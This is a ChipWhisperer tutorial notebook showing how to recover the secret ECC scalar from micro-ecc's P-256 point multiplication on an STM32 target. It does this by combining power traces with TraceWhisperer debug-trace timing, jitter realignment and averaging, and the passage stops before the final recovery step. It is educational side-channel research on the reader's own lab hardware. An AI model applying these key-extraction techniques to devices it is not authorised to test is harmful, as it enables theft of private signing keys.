# Breaking Software ECC with TraceWhisperer

## Background
To get the most out of this tutorial, some basic knowledge of elliptic curves, and in particular of point multiplication on elliptic curves, is required. A good overview is available here: https://cryptojedi.org/peter/data/eccss-20130911b.pdf.

The side-channel attack presented here targets the scalar multiplier $k$ in the elliptic curve point multiplication. Point multiplication is the most expensive operation in many (if not all?) cryptographic uses of elliptic curves. The secret scalar is not the private key, but learning the scalar used in an ECDSA signature (for example) allows the private key to be trivially calculated.

This attack is quite different from the AES side-channel attacks in our other tutorials. In most ECC point multiplication implementations (including the target used here), the secret scalar $k$ is processed one bit at a time. At a high level, the attack is very simple:
1. Identify when each bit of $k$ is processed on the power trace.
2. Find how processing a '1' is different from processing a '0'.
3. Assemble the secret $k$, one bit at a time.

The difficulty in attacking ECC is that there are a lot of different point multiplication algorithms, and so there isn't a single straightforward way to do the above steps.

Since we are attacking $k$ one bit at a time, its size has no impact on the difficulty of the attack. The curve used in this attack is the NIST P-256 curve; the same approach would work just as well with a larger curve. (In fact for some attacks, a larger curve can be beneficial, since it allows for more observations.)

Our attack requires multiple traces to be collected. The secret $k$ remains constant for each trace, but a different point must be used for each trace. However, we require no knowledge whatsoever of what the points actually are (which means that point blinding, a common countermeasure -- see [this paper](https://link.springer.com/chapter/10.1007/3-540-48059-5_25) for example -- would not be effective against this attack). Furthermore, if the attacker is limited to collecting a single trace for a given value of $k$, we will show in the end that we can correctly guess most of $k$.

The target for this attack is the popular [micro-ecc](https://github.com/kmackay/micro-ecc) library. We target directly the point multiplication implemented by its `uECC_point_mult` function, for the NIST P-256 (secp256r1) curve.

## TraceWhisperer

While this is an ECC tutorial, it also serves as a tutorial on using TraceWhisperer to help with side-channel analysis.

TraceWhisperer allows us to quickly zero-in on possible areas of interest in the power traces.

If you have a ChipWhisperer Husky, you're all set: TraceWhisperer functionality is built into it.

If you are using a ChipWhisperer-Lite or ChipWhisperer-Pro, you will also need our [TraceWhisperer](https://github.com/newaetech/DesignStartTrace/tree/master/hardware/tracewhisperer) tool (which is our [PhyWhisperer](https://github.com/newaetech/phywhispererusb) with a different FPGA bitfile) If you do not have a TraceWhisperer, you won't be able to run this tutorial in its present form, but you could try to build a TraceWhisperer-less version of this attack (let us know if you succeed!).

## Capture Notes

Most of the capture settings used below are similar to the standard ChipWhisperer scope settings. Some important points to note:

- The full ECC operation takes approximately 6 million clock cycles, so it is best done with a ChipWhisperer-Pro or Husky...
- ...but if you don't have a CW-Pro, and you have patience, it's also possible to run this with a ChipWhisperer-Lite. Every trace needs to be captured in several steps, using the sample offset feature (246 steps to be precise!), so trace acquisition is **much** slower: around 8 minutes/trace. The attack does not require a very large number of traces, but the initial profiling step will take over 13 hours. It's possible to skip this step by using the results provided in this tutorial. Then, the attack itself requires 20 traces, which is a more reasonable 2.5 hours (skip ahead to the "The Attack" section).
- To use a CW-lite, replace `capture_ecc_trace()` calls with `capture_ecc_trace_cwlite()`.
- It's possible that better results would be obtained with x4 sampling, but that would make trace acquisition with the CW-lite *very* slow!


## Supported Targets

This tutorial is written for a CW-Pro with a CW308 and an STM32F3; it can also be run on the CW-lite (Arm version) without any modifications, save for the capture limitations noted above.

It should be possible to port this tutorial to other Arm targets without too much effort.

In [None]:
#TRACE_PLATFORM = 'CW610' # AKA PhyWhisperer
TRACE_PLATFORM = 'Husky'
PLATFORM = 'CW308_STM32F3'
TRACE_INTERFACE = 'swo'
SCOPETYPE = 'OPENADC'

# other supported options:
#PLATFORM = 'CWLITEARM'

# not supported by this notebook, but can be made to work:
#PLATFORM = 'CW308_K82F'
#TRACE_INTERFACE = 'parallel'
#TRACE_PLATFORM = 'CW305'

## Attack Details

Since there are many ways to implement point multiplication, the first step towards an attack is understanding the target implementation.

Luckily, the micro-ecc code is well-commented, and [line 749 of uECC.c](https://github.com/kmackay/micro-ecc/blob/24c60e243580c7868f4334a1ba3123481fe1aa48/uECC.c#L749) points us directly to what we need to know: the implementation follows algorithm 9 of https://eprint.iacr.org/2011/338.pdf. This saves us from reversing the algorithm from the C code (or worse, from the power trace itself: see [this paper](https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf) for a great example of a black-box reversing of ECC).

Our target firmware calls the `uECC_point_mult()` function, which has three inputs: the curve (not a secret), the base point on the curve (not a secret), and the secret scalar multiplier $k$.

$k$ is then *regularized* by the `regularize_k()` function, which essentially adds the curve order to $k$. It is this regularized $k$, which we'll denote $k_r$, that the main multiplication loop iterates on, and so this is what our attack will retrieve. The following functions allow you to go from the input $k$ to the regularized $k_r$ (and vice-versa):

In [None]:
from ecpy.curves import Curve, Point
curve = Curve.get_curve('NIST-P256')

def random_k(bits=256, tries=100):
    import random
    for i in range(tries):
        k = random.getrandbits(bits)
        if k < curve.order and k > 0:
            return k
    raise ValueError("Failed to generate a valid random k after %d tries!" % self.tries)

def regularized_k(input_k, bits=256):
    """Given input k, return the regularized k that the target processes (which the attack will retrieve).
    """
    assert input_k < curve.order
    kr = input_k + curve.order
    if kr & 2**bits:
        kr -= 2**bits
    return kr   

def input_k(kr, bits=256):
    """Given the regularized k that the target processes (which the attack will retrieve), return the regularized k that the target will be processing.
    """
    if kr < curve.order:
        kr += 2**bits
    i_k = kr - curve.order
    assert i_k < curve.order # sanity check
    return i_k


Next, the `EccPoint_mult()` function is called. There, we find the main loop which processes (most of) the bits of $k_r$, one bit at a time:
```C
for (i = num_bits - 2; i > 0; --i) {
    nb = !uECC_vli_testBit(scalar, i);
    XYcZ_addC(Rx[1 - nb], Ry[1 - nb], Rx[nb], Ry[nb], curve);
    XYcZ_add(Rx[nb], Ry[nb], Rx[1 - nb], Ry[1 - nb], curve);
}
```

The point multiplication algorithm used is a variant of the [Montgomery Ladder](https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication#Montgomery_ladder).

`nb` is the secret bit being processed, and as you can see, there is no code that depends on `nb`: all that `nb` affects is which of `Rx[0], Ry[0], Rx[1], Ry[1]` is fed to the `XYcZaddC()` and `XYcZadd()` functions, which is were all the heavy lifting it done.

It's quite a clever algorithm, with inherent side-channel resistance for free! Clearly, micro-ecc will not be the easiest target to break -- this is not a toy example!

One thing that could be interesting to do now is to run a TVLA test, to confirm that there is no apparent secret-dependant side channel leakage from the *execution time* of this algorithm. Since this tutorial is already very long, this exercise is left to the reader.

Our attack will go as follows:
1. Use TraceWhisperer to identify when each call to `XYcZaddC()` and `XYcZadd()` is made.
2. Using a known $k_r$, look at the average power trace for each of these function calls when `nb=1` and when `nb=0`, to find some distinguishing markers.
3. With our distinguishers in hand, check that we can retrieve arbitrary $k$.

The high-level concept is simple, but there will be some tricky points along the way.

In [None]:
import chipwhisperer as cw

In [None]:
# platform setup:
if TRACE_PLATFORM == 'CW610':
    from chipwhisperer.capture.trace.TraceWhisperer import TraceWhisperer
    %run "../Setup_Scripts/Setup_Generic.ipynb"
    defines = ['../../software/chipwhisperer/capture/trace/defines/defines_trace.v', '../../software/chipwhisperer/capture/trace/defines/defines_pw.v']
    trace = TraceWhisperer(target, scope, force_bitfile=False, defines_files=defines)
    scope.clock.adc_src = "clkgen_x1"
    scope.gain.setGain(25)

elif TRACE_PLATFORM == 'Husky':
    %run "../Setup_Scripts/Setup_Generic.ipynb"
    scope.trace.target = target
    trace = scope.trace
    scope.clock.clkgen_freq = 10e6
    scope.clock.clkgen_src = 'system'
    scope.clock.adc_mul = 1
    scope.gain.setGain(19)
    target.baud = 38400 * 10 / 7.37

else:
    print('Refer to TraceWhisperer.ipynb for example of how to set up for CW305 target.')

In [None]:
trace.enabled = True
trace.clock.clkgen_enabled = True

In [None]:
if PLATFORM == 'CWLITEARM':
    scope.adc.samples = 24400
else: # for CW-pro / Husky:
    scope.adc.samples = 6000000
    scope.adc.stream_mode = True

### Program STM32 target:

**Warning**: if you make any changes to the target firmware (including compiler version and switches), there is a chance that the attack parameters used in this notebook won't work for you anymore. So, for your first run-through, stick with the provided binary.

But, making changes to the target firmware is a great way to learn how to use TraceWhisperer, so once you've had success with the default bitfile, do go ahead and try some changes! In fact the TraceWhisperer should make it easier to port the attack.

In [None]:
#%%bash -s "$PLATFORM"
#cd ../../hardware/victims/firmware/simpleserial-ecc
#make PLATFORM=$1 CRYPTO_TARGET=MICROECC

In [None]:
fw_path = '../../hardware/victims/firmware/simpleserial-ecc/simpleserial-ecc-{}.hex'.format(PLATFORM)

In [None]:
if (PLATFORM == 'CW308_STM32F3') or (PLATFORM == 'CWLITEARM'):
    prog = cw.programmers.STM32FProgrammer
    cw.program_target(scope, prog, fw_path)

In [None]:
reset_target(scope)

In [None]:
# target info and buildtimes:
print(trace.phywhisperer_name())
print(trace.get_fw_buildtime())
if TRACE_PLATFORM == 'Husky':
    print(scope.fpga_buildtime)
else:
    print(trace.fpga_buildtime)

### Set SWO operation mode:

Arm processors which support JTAG and SWD come out of reset in JTAG mode. In order to get trace data out of the SWO pin, we need to switch it over to SWD mode.

The `jtag_to_swd()` call below runs a special sequence on the TMS and TCK pins to do this switchover. However, different processors may have *additional* requirements to enable the SWO pin. The `simpleserial-trace` firmware handles this for our STM32 target.

Another sure-fire way to get a target into SWD mode is to use an external debugger. In that case, do not call `jtag_to_swd()`, as this could result in contention on the TMS/TCK pins, but do call `trace.set_trace_mode()`, because TraceWhisperer still needs to know that the target is in SWO mode.

The image and table below shows the jumper cables that you need to connect between the PhyWhisperer and the target:

![jumpers](img/uecc_jumpers.png)

| PhyWhisperer | Target     |
|     :-:      |    :-:     |
|      D0      |    TMS     |
|      D1      |    TCK     |
|      D2      |    TDO     |
|      PC      | GPIO4/TRIG |
|      HS2     |   CLKIN    |
|     GND      |    GND     |

(Not shown in the picture is the HS2 - CLKIN connection, because earlier versions of TraceWhisperer did not support this.)

If you're using ChipWhisperer-Husky, then you only need the D0, D1 and D2 connections; the rest are provided by the 20-pin target cable.

In [None]:
if TRACE_INTERFACE == 'swo':
    assert TRACE_PLATFORM == 'CW610' or TRACE_PLATFORM == 'Husky', "Not supported :-("
    trace.clock.fe_clock_src = 'target_clock'
    assert trace.clock.fe_clock_alive, "Hmm, the clock you chose doesn't seem to be active."
    trace.trace_mode = 'SWO'
    trace.jtag_to_swd() # switch target into SWO mode

    # Now the complicated bit:
    acpr = 0
    trigger_freq_mul = 8
    trace.clock.swo_clock_freq = scope.clock.clkgen_freq * trigger_freq_mul
    trace.target_registers.TPI_ACPR = acpr
    trace.swo_div = trigger_freq_mul * (acpr + 1)
    assert trace.clock.swo_clock_locked, "Trigger/UART clock not locked"
    assert scope.userio.status & 0x4, "SWO line not high"

else:
    print("Not supported in this notebook. See TraceWhisperer.ipynb to see how to set this up.")

In [None]:
scope.clock.reset_adc()
time.sleep(0.2)
assert (scope.clock.adc_locked), "ADC failed to lock"

#### Check that the target is alive:
If `get_fw_buildtime()` produces no output, the target may have become unresponsive after the above changes; it may simply require a reset.

In [None]:
reset_target(scope)
print(trace.get_fw_buildtime())

### Trigger trace capture from target FW:

In [None]:
trace.capture.trigger_source = 'firmware trigger'

### Set a pattern matching rule and capture only rule match IDs:

TraceWhisperer can be set to collect raw trace data, or it can be set to simply record the times when the trace data matches a given pattern. For this use-case, we'll use the latter because it's more simple, and it's sufficient for our needs.

Refer to the [TraceWhisperer tutorial notebook](https://github.com/newaetech/DesignStartTrace/blob/master/jupyter/TraceWhisperer.ipynb) to learn more about TraceWhisperer's capabilities.

In [None]:
trace.capture.raw = False

# match on any PC match (isync) trace packet:
trace.set_pattern_match(0, [3, 8, 32, 0, 0, 0, 0, 0], [255, 255, 255, 0, 0, 0, 0, 0])

# enable matching rule:
trace.capture.rules_enabled = [0]

### How long to capture for:
Debug trace data will be collected as long at the target trigger output is high.

In [None]:
trace.capture.mode = 'while_trig'

### Customized functions to run and capture ECC power traces:

In [None]:
%run "ECC_capture.ipynb"

In [None]:
if TRACE_PLATFORM == 'CW610':
    print("*** Don't forget the jumper cable from CW308 GPIO4/TRIG pin to PhyWhisperer PC pin on side connector! ***")

By default the target is set to periodically emit trace synchronization frames. This is handy for verifying that the trace link is active, but it's detrimental to our attack: if a sync event occurs during the ECC operation, it could delay the trace events that we are using to help guide the attack. This disables the periodic sync frames:

In [None]:
trace.target_registers.DWT_CTRL = '40000021'

## First step of the attack: establish distinguishing markers

We start building the attack by using a known $k_r$ with an easy-to-recognize pattern so that we can look for what's different when `nb=0` versus `nb=1`.

This step, which only needs to be done once, is the longest part of the notebook: once this is done, carrying out the attack is much faster.

In [None]:
# big block of 1's, big block of 0's:
k = 0xf0000000fffffffefffffffffffffff04319055258e8617b0c46353d039cdaaf
kr = regularized_k(k)
hex(kr)

We then specify that we want to receive trace events when execution reaches addresses `0x08001196` and `0x080011bc`, which are the start of the `XYcZaddC()` and `XYcZadd()` function calls, respectively.
(If you make any changes to the firmware, adjust these as necessary.)

You might think that we should spend more time analyzing the source code and assembly, to carefully pick potentially leaky instructions. But here's the thing:
1. We really don't know what is the delay from a target instruction being executed to when the debug trace event is received.
2. As we'll soon see, the debug trace events can have significant amounts of jitter.

So we're using trace to find gross markers, not precise ones: we don't need to specify the exact addresses where we suspect/hope to find leakage. As long as we're in the vicinity, we should be ok.

In [None]:
trace.set_isync_matches(addr0=0x08001196, addr1=0x080011bc, match='both')

We then collect 100 traces. Each trace uses the same $k$, but a different base point. Using a different point allows us to "average out" the contribution of the base point to the power trace, to better focus on the effect of $k$.

In [None]:
import random
def new_point():
    tries = 100
    for i in range(tries):
        x = random.getrandbits(256)
        y = curve.y_recover(x)
        if y:
            return (x,y)
    raise ValueError('Failed to generate a random point')

In [None]:
traces = 100

from tqdm.notebook import tnrange

ptraces = []
raws = []

# acquire power and debug traces:
for t in tnrange(traces, desc='Capturing traces'):
    Px, Py = new_point()
    trace.arm_trace()
    ptrace = capture_ecc_trace(k, Px, Py)
    ptraces.append(ptrace)
    while trace.fifo_empty(): pass
    raws.append(trace.read_capture_data())

# convert debug traces into timestamps:
times = []
for i in range(len(raws)):
    times_both_markers = trace.get_rule_match_times(raws[i], rawtimes=False, verbose=False)
    assert len(times_both_markers) == 510
    times_p1 = times_both_markers[::2]
    times_p2 = times_both_markers[1::2]
    times.append([times_p1, times_p2])

The multi-dimensional `times` array carries the trace event timestamps; its dimensions are as follows:

`times [trace number] [address match index] [k index]`

Recall there are 100 traces, 2 address match indices, and 255 k indices. (Why 255 and not 256? Because the last bit of k is processed outside of the main loop. We'll see in the final attack that this doesn't matter.)

In [None]:
# sanity check:
assert trace.errors == None

It's always worth checking whether the execution time of each loop iteration is leaking $k$. Let's compute the average of $i^{th}$ loop iteration over all the traces and see whether we can find $k$ in there:

In [None]:
deltas = []

prev = 0
for kbit in range(len(times[0][0])):
    sum = 0
    for T in range(len(ptraces)):
        ts = times[T][0][kbit][0]
        sum += ts
    delta = sum - prev
    prev = sum
    deltas.append(delta)

In [None]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.resources import INLINE
from bokeh.models import Span

output_notebook(INLINE)

deltaplot = figure(plot_width=1800)

xrange = range(len(deltas[1:]))

deltaplot.line(xrange, deltas[1:], line_color='green')

In [None]:
show(deltaplot)

Nope -- recall that $k_r$ is a long string of ones followed by a long string of zeros. Even with averaging over many traces, there doesn't seem to be any leakage there.

This shouldn't be surprising since we know the target is using the Montgomery Ladder algorithm.

If you want to be more formal, you could apply the TVLA test here -- this is left as an exercise to the reader.

### Compute the relationship between power and debug times:
Since power and debug times are captured from different clocks, we need to know their relationship, in order to combine the two data sources.

See [this page](https://github.com/newaetech/DesignStartTrace/tree/master/hardware/tracewhisperer/clocks.md) to understand how this is done.

In [None]:
if scope._is_husky:
    multiplier = scope.clock.adc_mul
elif scope.clock.adc_src == 'clkgen_x4' or scope.clock.adc_src == 'extclk_x4':
    multiplier = 4
else:
    multiplier = 1

## Dealing with jitter

There is variance in the time between the occurance of a trace event and the corresponding trace output, and this makes trace a little tricky to use for side-channel analysis.

We know that this jitter exists, and we can quantify it by looking at the corresponding power traces. If there were no jitter, the power traces from multiple runs, indexed from a trace event, would overlay nicely and show good alignment.

Instead, this is what we have:

In [None]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.resources import INLINE
from bokeh.models import Span

output_notebook(INLINE)

jitterplot = figure(plot_width=1800)

trace_index = 10
marker = 1
length = 500
offset = 0
start = 0

xrange = range(length)

indices = []
for i,color in zip([1,2,3,4,5,6,7], ['yellow', 'blue', 'red', 'orange', 'green', 'brown', 'black']):
    base = int(times[trace_index][marker][i][0]*multiplier)
    jitterplot.line(xrange, ptraces[trace_index].wave[base+offset+start : base+offset+start+length], line_color=color)


In [None]:
show(jitterplot)

To deal with this jitter, we pick one of the trace segments to be the reference trace. Then, for every other trace segment, we compute the sum of absolute differences for various offsets; the offset which yields the smallest difference is chosen.

We'll do this using two different trace start times: the time at which trace events were received, and the time 200 clock cycles before that. We do this because, as we will soon illustrate, traces can only be aligned for small periods of time; by trial and error it's been determined that these two start times provide useful trace segments.


In [None]:
import numpy as np
basesegment = 0
offsets = np.zeros([2,len(ptraces),2,255], np.int32)

for A in range(2): # early/late realignment offset
    if A == 0:
        start = -200
        complength = 300
    else:
        start = 0
        complength = 1000
    for M in range(2): # address match index
        reftrace = np.asarray(ptraces[0].wave[int(times[0][M][basesegment][0]*multiplier) + start : int(times[0][M][basesegment][0]*multiplier) + complength + start])
        for T in tnrange(len(ptraces), desc='Realigning for A=%d, M=%d' % (A,M)):
            for kbit in range(255):
                if kbit == basesegment:
                    pass
                else:
                    diffs = []
                    for offset in range(-100,100):
                        comptrace = np.asarray(ptraces[T].wave[int(times[T][M][kbit][0]*multiplier) + offset + start : int(times[T][M][kbit][0]*multiplier) + complength + offset + start])
                        diffs.append(np.sum(abs(reftrace-comptrace)))
                    if min(diffs) < np.average(np.asarray(diffs))*.7:
                        offsets[A][T][M][kbit] = diffs.index(min(diffs)) - 100
                    else:
                        print('Failure for t=%d, i=%d (min=%f, avg=%f)' % (t, i, min(diffs), np.average(np.asarray(diffs))))


For clarity, the multi-dimensional `offsets` array has dimensions 2 x 100 x 2 x 255, defined as follows:

`offsets [early / late realignment] [trace number] [address match index] [k index]`

Since it's easy to get confused when working with these large multi-dimensional arrays, throughout the notebook we'll stick to a consistant naming scheme for the indexing variables:
- `A`: early/late realignment (0 or 1)
- `M`: address match index (0, for PC=0x08001196 match events, or 1, for PC=0x080011bc match events)
- `T`: trace number
- `kbit`: k index (0-255)

Let's look at the resulting aligned traces:

In [None]:
alignedplot = figure(plot_width=1800)

trace_index = 5
alignment = 1
marker = 1
length = 1400
offset = 0

if alignment == 0:
    start = -200
else:
    start = 0

xrange = range(length)

indices = []
for i in range(120,150):
    base = int(times[trace_index][marker][i][0]*multiplier)
    alignedplot.line(xrange, ptraces[trace_index].wave[base+offset+offsets[alignment][trace_index][marker][i]+start : base+offset+offsets[alignment][trace_index][marker][i]+length+start], line_color='blue')

    base = int(times[trace_index+1][marker][i][0]*multiplier)
    alignedplot.line(xrange, ptraces[trace_index+1].wave[base+offset+offsets[alignment][trace_index+1][marker][i]+start : base+offset+offsets[alignment][trace_index+1][marker][i]+length+start], line_color='red')

    base = int(times[trace_index+2][marker][i][0]*multiplier)
    alignedplot.line(xrange, ptraces[trace_index+2].wave[base+offset+offsets[alignment][trace_index+2][marker][i] + start : base+offset+offsets[alignment][trace_index+2][marker][i]+length+start], line_color='green')


In [None]:
show(alignedplot)

Here we see that traces are aligned from cycle 40 onwards until cycle 1270, where they diverge again. This is to be expected since we've already seen there is some variance in the execution time of our two target functions.

Finally, it's instructive to visualize the computed offsets (to deal with the debug trace jitter). First, let's look at the offset for the same power trace segment across all collected traces:

In [None]:
offset_all_traces = []
kbit = 1
A = 1
M = 0
for T in range(len(ptraces)):
    offset_all_traces.append(offsets[A][T][M][kbit])

offsetplot = figure(plot_width=1200, plot_height=300)
xrange = range(len(offset_all_traces))
offsetplot.line(xrange, offset_all_traces)

In [None]:
show(offsetplot)

We see that for the target operation, jitter oscillates between two values that are 71 clock cycles apart.

Now let's look at the offsets throughout the execution of a single trace:

In [None]:
offsets_one_trace = []
T = 1
A = 1
M = 1
for kbit in range(255):
    offsets_one_trace.append(offsets[A][T][M][kbit])

offsetplot = figure(plot_width=1200, plot_height=300)
xrange = range(len(offsets_one_trace))
offsetplot.line(xrange, offsets_one_trace)

In [None]:
show(offsetplot)

Again we see the 71 cycle jitter which oscillates back and forth.

Before we continue, we need to possibly shift our computed offsets. The reason for this will become more clear in a little bit, when we look at the differences between processing zeros vs ones.

For now, just know that depending on sign of the offsets (which may be positive or negative), we make an adjustment to the offsets, which means that we shift the per-bit trace segments.

Note that this step isn't at all necessary for the attack to work: it just makes the tutorial easier to follow and makes things "just work" in a (hopefully!) fool-proof way.

In [None]:
signs = np.zeros([2,2], np.int8)
verbose = False
for A in range(2):
    for M in range(2):
        if verbose: print('A,M = %d, %d...' % (A, M))
        sign = ''
        for T in range(len(ptraces)):
            for kbit in range(1,255):
                oo = offsets[A][T][M][kbit]
                if abs(oo) > 40:
                    if oo > 0:
                        if not sign:
                            if verbose: print('POSITIVE: got %d for T %d, kbit %d' % (oo, T, kbit))
                            signs[A][M] = 1
                        elif sign == 'negative':
                            print('SIGN CHANGE!!! got %d for T %d, kbit %d' % (oo, T, kbit))
                        sign = 'positive'
                    else:
                        if not sign:
                            if verbose: print('NEGATIVE: got %d for T %d, kbit %d' % (oo, T, kbit))
                            signs[A][M] = -1
                        elif sign == 'positive':
                            print('SIGN CHANGE!!! got %d for T %d, kbit %d' % (oo, T, kbit))
                        sign = 'negative'

                    break

assert (signs[0][0] == 0) and (signs[0][1] == 0), 'Oops, never seen this before! Try repeating the trace capture and hope this error goes away.'

A = 1
for M in range(2):
    if signs[A][M] < 0:
        print('Adjusting offsets by +71 for A=%d, M=%d' % (A, M))
        for T in range(len(ptraces)):
            offsets[A][T][M] += 71

## Look at average ones and averages zeros:
We have four different places to look at for differences between ones and zeros:
1. `XYcZaddC()` function call, -200 clock cycle realignment
2. `XYcZaddC()` function call, 0 clock cycle realignment
3. `XYcZadd()` function call, -200 clock cycle realignment
4. `XYcZadd()` function call, 0 clock cycle realignment

We're going to look at average power segments for ones and zeros for each of these four.
We'll build a pair of 2x2x2000 multi-dimensional average arrays (one for ones, one for zeros), defined as follows:

`average array [early/late realignment] [address match index] [power sample index]`


In [None]:
length = 2000

avg_zeros = np.zeros([2,2,length])
avg_ones = np.zeros([2,2,length])

for A in range(2):
    if A == 0:
        offset = -200
    else:
        offset = 0
    for M in range(2):
        zeros = 0
        ones = 0
        for T in range(len(times)):
            azeros = np.zeros(length)
            aones = np.zeros(length)
            for i in range(0,255):
                base = int(times[T][M][i][0]*multiplier)+start
                data = ptraces[T].wave[base+offset+offsets[A][T][M][i]:base+offset+offsets[A][T][M][i]+length]
                if i < 124:
                    azeros += data
                    zeros += 1
                else:
                    aones += data
                    ones += 1
        avg_zeros[A][M] = azeros/zeros
        avg_ones[A][M] = aones/ones


#### And now we plot:
Here is where we hope to find, in at least some of our averages, some power signature which leaks information on whether the target is processing a one or a zero.

Recall there are 4 different sets of averages, and so 4 different plots to consider. Play with the A and M variables to see each of the sets, or skip ahead to the interactive plot.

In [None]:
from bokeh.models import tools

A = 1     # choose 0 or 1 (early or late realignment)
M = 0   # choose 0 or 1 (first or second function call)
start = 0
stop = 2000
avgplot = figure(plot_width=1800)
avgplot.add_tools(tools.HoverTool())

xrange = range(start, stop)

# average ones:
avgplot.line(xrange, avg_ones[A][M][start:stop], line_color='red')

# average zeros:
avgplot.line(xrange, avg_zeros[A][M][start:stop], line_color='blue')

# difference between average ones and average zeros:
avgplot.line(xrange, avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop], line_color='purple')


In [None]:
show(avgplot)

Thw interactive plot that follows makes it easier to explore the averages and find potential markers for each of the four sets of trace segments:

In [None]:
def update_plot(realignment=0, function_call=0, start=0, stop=2000, show_diffs=1, show_avg=0, show_raw=1):
    A = realignment
    M = function_call
    
    xrange = range(start,stop)
    
    ao.data_source.data['x'] = xrange
    az.data_source.data['x'] = xrange
    ad.data_source.data['x'] = xrange
    raw1.data_source.data['x'] = xrange
    raw2.data_source.data['x'] = xrange
    raw3.data_source.data['x'] = xrange
    
    if show_avg:
        ao.data_source.data['y'] = avg_ones[A][M][start:stop]
        az.data_source.data['y'] = avg_zeros[A][M][start:stop]
    else:
        ao.data_source.data['y'] = np.zeros(stop-start)
        az.data_source.data['y'] = np.zeros(stop-start)

    if show_diffs:
        ad.data_source.data['y'] = avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop]
    else:
        ad.data_source.data['y'] = np.zeros(stop-start)

    if show_raw:
        if A==0:
            rawstart = -200
        else:
            rawstart = 0
        raw1start = int(times[1][M][10][0]*multiplier)+offsets[A][1][M][10]+rawstart+start
        raw2start = int(times[2][M][10][0]*multiplier)+offsets[A][2][M][10]+rawstart+start
        raw3start = int(times[3][M][10][0]*multiplier)+offsets[A][3][M][10]+rawstart+start
        raw1.data_source.data['y'] = ptraces[1].wave[raw1start:raw1start+stop]
        raw2.data_source.data['y'] = ptraces[2].wave[raw2start:raw2start+stop]
        raw3.data_source.data['y'] = ptraces[3].wave[raw3start:raw3start+stop]
    else:
        raw1.data_source.data['y'] = np.zeros(stop-start)
        raw2.data_source.data['y'] = np.zeros(stop-start)
        raw3.data_source.data['y'] = np.zeros(stop-start)

    push_notebook()

In [None]:
from ipywidgets import interact, Layout
from bokeh.io import push_notebook
from bokeh.models import tools

output_notebook(INLINE)
avgplot = figure(plot_width=2000)
avgplot.add_tools(tools.HoverTool())

A=0
M=0
start = 0
stop = 2000

xrange = range(start,stop)
ao = avgplot.line(xrange, avg_ones[A][M][start:stop], line_color='red')
az = avgplot.line(xrange, avg_zeros[A][M][start:stop], line_color='blue')
ad = avgplot.line(xrange, avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop], line_color='purple', line_width=2)

if A==0:
    rawstart = -200
else:
    rawstart = 0

raw1start = int(times[1][M][10][0]*multiplier)+offsets[A][1][M][10]+rawstart+start
raw2start = int(times[2][M][10][0]*multiplier)+offsets[A][2][M][10]+rawstart+start
raw3start = int(times[3][M][10][0]*multiplier)+offsets[A][3][M][10]+rawstart+start

raw1 = avgplot.line(xrange, ptraces[1].wave[raw1start:raw1start+stop], line_color='red')
raw2 = avgplot.line(xrange, ptraces[2].wave[raw2start:raw2start+stop], line_color='blue')
raw3 = avgplot.line(xrange, ptraces[3].wave[raw3start:raw3start+stop], line_color='green')


In [None]:
show(avgplot, notebook_handle=True)

In [None]:
interact(update_plot, realigment=(0,1), function_call=(0, 1), start=(0,2000), stop=(0,2000), show_diffs=(0,1), show_avg=(0,1), show_raw=(0,1))

## Selecting points of interest:
As you play with all the knobs, here's the trick: for the purposes of our attack it's only useful to consider differences between zeros and ones when they occur at times where the raw traces are well aligned.

Otherwise, we're picking up on differences which are due to the different points, not differences which are due to different values of k. If we averaged a much larger number of traces, it's possible that the differences which now show up when the traces are unaligned would average out to zero. But, from what we know of the multiplication algorithm, we know the differences between 0 and 1 are going to be very small, so let's focus on that.

With this in mind, these are the start/stop ranges that we'll use for each of the four combinations of realignment point and function call, along with the thresholds that we'll use to select points of interest:

| realignment | function | start | stop | threshold |
|     :-:     |     :-:  |   -:  |   -: |     -:    |
|      0      |      0   |   0   |  230 |     2e-4  |
|      0      |      1   |   0   |  230 |     5e-5  |
|      1      |      0   |  50   |  300 |     3e-5  |
|      1      |      1   |  50   |  300 |     3e-5  |


These thresholds were picked in a somewhat ad-hoc intuitive manner. From what we know of the code, we expect the secret leakage to be limited to very few instructions, so we selected thresholds which filter all but the highest peaks, so that we don't end up with too many points of interest.

These aren't necessarily the optimal values, but as we'll soon see, they mostly work quite well. Once you've gone through the attack, come back here and experiment with different thresholds -- you may be able to improve the attack.

Also, this is why we adjusted our offsets to be positive a few cells back: otherwise, the start/stop ranges could be different from run to run. That's not necessarily a problem, but it would require you to manually select appropriate start and stop points, which could be error-prone. By adjusting the offsets, we've established a common ground, and the default settings should work everytime.

For reference, here is roughly what you should see for A=1, M=1 (poi11); the start offset is set to 50 to exclude the initial peaks which are due to unaligned power samples. The two broad peaks around index 70 and 250 are the ones we are interested in.
![poi11](img/uecc_poi11.png)

In [None]:
pois = []
for A in range(len(offsets)): # iterate 2 realignment offsets
    apois = []
    for M in range(len(offsets[0][0])): # iterate 2 address matches
        # code the values from the above table:
        if [A,M] == [0,0]:
            start = 0
            stop = 230
            threshold = 2e-4
        elif [A,M] == [0,1]:
            start = 0
            stop = 230
            threshold = 5e-5
        elif [A,M] == [1,0]:
            start = 50
            stop = 300
            threshold = 3e-5
        elif [A,M] == [1,1]:
            start = 50
            stop = 300
            threshold = 3e-5

        positives = list(np.where(avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop] > threshold)[0] + start)
        negatives = list(-np.where(avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop] < -threshold)[0] - start)
        apois.append(positives+negatives)

    pois.append(apois)

The 2x2 `pois` array contains our chosen points of interest for each of the four combinations of realignment and function.
We used a little trick to grab both positive and negative differences: when the difference is negative, we make the index negative. That way, it's easy for the attack code to deal with both positive and negative differences (i.e. it will know whether to add or substract).

As a sanity check, let's see what our chosen points of interest are:

They should be similar to (but likely not identical) to these:

In [None]:
#pois = [[[-6, -108, -109, -110, -111, -128], [14, 15, -1, -28, -29, -38, -39, -48, -49, -59, -69, -79, -89]], [[77, 78, 257, -80, -103, -206, -215, -259], [-71, -72, -73, -74, -251, -252, -253]]]

## Does it work?
We're finally ready to see whether all this works or not!

We'll now sum up the power measurements at each of the points of interest, for each of the bits of k, and see whether the results allows us to recover $k_r$.

Let's use an interactive plot to see the contribution of each of the 4 sets of points of interest, as well as the number of traces.

